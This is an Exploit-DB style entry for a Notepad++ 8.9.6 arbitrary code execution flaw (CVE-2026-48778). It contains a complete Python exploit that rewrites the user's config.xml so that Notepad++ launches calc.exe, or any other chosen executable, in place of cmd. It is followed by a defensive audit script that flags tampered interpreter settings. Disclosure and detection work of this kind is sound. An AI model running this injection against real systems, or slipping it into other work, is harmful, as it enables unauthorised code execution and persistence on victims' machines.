Notepad++ 8.9.6 - Arbitrary Code Execution

EDB-ID: 52606
Platform: Windows
Date: 2026-05-30


# Exploit Title: Notepad++ 8.9.6 - Arbitrary Code Execution
# Date: 2026-05-30
# Exploit Author: Kavin Jindal (Avyukt Security) https://www.linkedin.com/in/kavin-jindal/
# Vendor Homepage: https://notepad-plus-plus.org
# Software Link: https://notepad-plus-plus.org/downloads/v8.9.6/
# Version: <= 8.9.6
# Tested on: Windows 10/11
# CVE: CVE-2026-48778
# Reference: https://github.com/notepad-plus-plus/notepad-plus-plus/security/advisories/GHSA-7hm3-wp5q-ccv9
#
# Description:
# Notepad++ reads <GUIConfig name="commandLineInterpreter"> from config.xml without
# validation and passes it to ShellExecute when "Open Containing Folder in cmd" is
# triggered. An attacker with write access to %APPDATA%\Notepad++\ can inject an
# arbitrary executable path, resulting in code execution under the current user context.
# In the following script, `calc.exe` has been used to demonstrate this vulnerability.


import os
import sys

# Locate the per-user Notepad++ configuration; APPDATA is normally set on Windows.
# os.environ.get() is used so a missing variable reaches the check below instead
# of raising KeyError.
appdata = os.environ.get("APPDATA")
if not appdata:
    print("[!] APPDATA environment variable not found, exiting..")
    sys.exit(1)

config_path = os.path.join(appdata, "Notepad++", "config.xml")
if os.path.exists(config_path):
    print("[+] Found config.xml at", config_path)
else:
    print("[!] config.xml not found. Ensure Notepad++ is installed and has been launched at least once.")
    sys.exit(1)

with open(config_path, "r", encoding="utf-8") as f:
    s = f.readlines()

# The value of commandLineInterpreter is handed to ShellExecute unvalidated, so
# any executable name or path placed here is what gets launched.
payload = '<GUIConfig name="commandLineInterpreter">calc.exe</GUIConfig>\n'
injected = False

for num, line in enumerate(s):
    if '<GUIConfig name="commandLineInterpreter">' in line:
        # An entry already exists: overwrite it in place.
        print("[!] Injecting payload..")
        s[num] = payload
        injected = True
        break
    elif "</GUIConfigs>" in line:
        # No entry yet: add one just before the closing GUIConfigs tag.
        print("[!] Injecting payload..")
        s.insert(num, payload)
        injected = True
        break

if not injected:
    print("[!] Payload injection failed.")
    sys.exit(1)

with open(config_path, "w", encoding="utf-8") as f:
    f.writelines(s)

print("[+] Payload injected successfully!")
print("[+] Testing: Open Notepad++ > File > Open Containing Folder > cmd")
print("[+] Calc.exe will launch instead of cmd.")
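The description above gives a defender one concrete thing to look for: a commandLineInterpreter entry in the per-user config.xml whose value is anything other than the stock interpreter. The following audit script is an added example written for this page; it is not part of the Exploit-DB entry or of Notepad++. It assumes a simplified config layout (a GUIConfigs element holding GUIConfig children, as the exploit's own string matching implies), an allowlist of `cmd`/`cmd.exe` as the expected value, and uses constructed sample documents rather than real config files. It also handles the case where the element is absent, which the exploit above treats as the second injection path.

```python
# Added example for this page (not the exploit author's code and not Notepad++ code):
# audit a Notepad++ config.xml for a tampered commandLineInterpreter value.
import os
import xml.etree.ElementTree as ET

# Values a stock install is expected to carry here; this allowlist is an assumption.
ALLOWED_INTERPRETERS = {"cmd", "cmd.exe"}


def get_interpreter(config_xml: str):
    """Return the text of <GUIConfig name="commandLineInterpreter">, or None if absent."""
    root = ET.fromstring(config_xml)
    for node in root.iter("GUIConfig"):
        if node.get("name") == "commandLineInterpreter":
            return (node.text or "").strip()
    return None


def audit_interpreter(config_xml: str):
    """Return (is_suspicious, reason) for the interpreter setting in the given XML text."""
    value = get_interpreter(config_xml)
    if value is None:
        # No override present: Notepad++ falls back to its built-in default.
        return False, "commandLineInterpreter not set; built-in default applies"
    if value.lower() in ALLOWED_INTERPRETERS:
        return False, f"interpreter is {value!r}"
    # A path component in the value is the clearest sign of the injection described above.
    if os.sep in value or "/" in value or ":" in value:
        return True, f"interpreter carries a path: {value!r}"
    return True, f"interpreter is not on the allowlist: {value!r}"


def audit_file(path: str):
    """Audit an on-disk config.xml (e.g. %APPDATA%\\Notepad++\\config.xml)."""
    with open(path, encoding="utf-8") as f:
        return audit_interpreter(f.read())


# Constructed sample documents, deliberately reduced to the elements the audit needs.
BENIGN = """<NotepadPlus>
  <GUIConfigs>
    <GUIConfig name="commandLineInterpreter">cmd</GUIConfig>
  </GUIConfigs>
</NotepadPlus>"""

TAMPERED = BENIGN.replace(">cmd<", ">calc.exe<")
ABSENT = "<NotepadPlus><GUIConfigs></GUIConfigs></NotepadPlus>"

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN), ("tampered", TAMPERED), ("absent", ABSENT)):
        flagged, reason = audit_interpreter(sample)
        print(f"{label}: {'SUSPICIOUS' if flagged else 'ok'} - {reason}")
```

Run on a real install with `audit_file(os.path.join(os.environ["APPDATA"], "Notepad++", "config.xml"))`; any flagged result is worth comparing against the file's modification time and the account's write history, since the advisory's precondition is write access to that directory.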